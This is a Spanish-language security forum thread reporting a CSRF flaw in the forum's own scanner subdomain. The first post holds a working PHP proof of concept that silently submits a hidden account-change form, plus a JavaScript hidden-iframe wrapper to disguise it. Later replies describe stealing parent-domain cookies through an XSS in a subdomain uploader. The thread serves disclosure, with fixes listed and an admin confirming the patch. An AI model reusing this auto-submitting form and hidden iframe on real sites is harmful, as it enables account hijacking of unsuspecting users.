comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[CSRF]Scanner Underc0de

  • 6 Respuestas
  • 2414 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« en: Febrero 29, 2016, 10:37:00 am »
Url: scanner.underc0de.org

Código: You are not allowed to view links. Register or Login
<?php
//Codded: Matabarras
$url "scanner.underc0de.org"//url
//Parametros post que modificaremos :D
$form["password"] = ""//Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "prueba@hotmail.es"//cambiamos el correo por el que queramos
$form["fname"] = "meaburro"//nombre
$form["lname"] = "vayavaya"//apellidos
$form["newsletter"] = 0//recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>


Camuflar el csrf, easy.

Código: You are not allowed to view links. Register or Login
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Index
Código: You are not allowed to view links. Register or Login
<script src="a.js"></script>
Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.


No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1892
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Marzo 01, 2016, 09:25:59 am »
Solucionada vulnerabilidad mediante aplicación de un token específico para cada cuenta y verificación de contraseña actual.

Reporte de @You are not allowed to view links. Register or Login Duplicado, reporte original por @You are not allowed to view links. Register or Login hace 2 semanas.

Gracias por reportar!

Saludos.
« Última modificación: Marzo 01, 2016, 09:30:48 am por blackdrake »



Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #2 en: Marzo 01, 2016, 05:06:39 pm »
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado nuclan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Marzo 14, 2016, 01:24:45 pm »
You are not allowed to view links. Register or Login
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas

Desconectado po6xsecpo

  • *
  • Underc0der
  • Mensajes: 45
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: po6xsecpo@gmail.com
« Respuesta #4 en: Marzo 14, 2016, 01:36:15 pm »
Cierto, Mago se jactaba mientras cantaba bachata(?)

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #5 en: Marzo 15, 2016, 08:00:11 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado nuclan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Marzo 15, 2016, 08:33:48 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
Si, ya pillo por donde ibas  :P en ese caso estando bajo el mismo dominio es cierto que puedes acceder a la cookie del dominio principal

 

¿Te gustó el post? COMPARTILO!



Sqli Android app por QR o Barcode Scanner

Iniciado por hdbreaker

Respuestas: 5
Vistas: 2671
Último mensaje Noviembre 18, 2013, 11:19:45 am
por Pr0ph3t
Seriously(?) [Effiliation.com + emailtemporal.org] CSRF,XSS,BYPASS..

Iniciado por Matabarras

Respuestas: 2
Vistas: 1683
Último mensaje Junio 25, 2016, 07:04:39 am
por blackdrake